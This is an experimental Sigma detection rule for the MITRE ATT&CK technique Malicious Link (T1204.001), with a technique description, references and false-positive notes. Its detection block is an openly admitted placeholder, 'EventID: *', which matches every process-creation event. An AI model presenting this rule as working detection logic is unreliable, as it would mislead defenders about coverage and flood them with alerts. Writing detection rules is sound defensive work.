title: Malicious Link (T1204.001)
id: df00tech-t1204-001
status: experimental
description: "Adversaries may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from spearphishing links delivered via email, messaging platforms, or social media. Clicking on a link may lead to exploitation of a browser or application vulnerability, or direct download of a file requiring execution. Threat actors including FIN7, Kimsuky, QakBot, Bazar, and Mustang Panda have all leveraged malicious links as initial access vectors, often hosting payloads on legitimate cloud services such as Google Docs, OneDrive, or Dropbox to evade reputation-based filtering."
references:
  - https://attack.mitre.org/techniques/T1204/001/
  - https://df00tech.com/detections/T1204.001
author: df00tech
date: 2026/04/19
tags:
  - attack.t1204.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Enterprise software deployment portals that use browser-initiated installers (ClickOnce, MSIX) may trigger msiexec.exe as a browser child process"
  - "Legitimate browser extensions or helper applications (e.g., meeting clients, VPN agents) that launch via protocol handlers (e.g., zoom://, msteams://)"
  - "Developer workstations where browser-based IDEs or tools legitimately spawn Node.js, Python, or PowerShell processes"
  - IT-managed browser kiosks running automation scripts that interact with browsers and spawn controlled child processes
  - PDF viewers or office document handlers launched from browser downloads that briefly show browser as parent process
level: high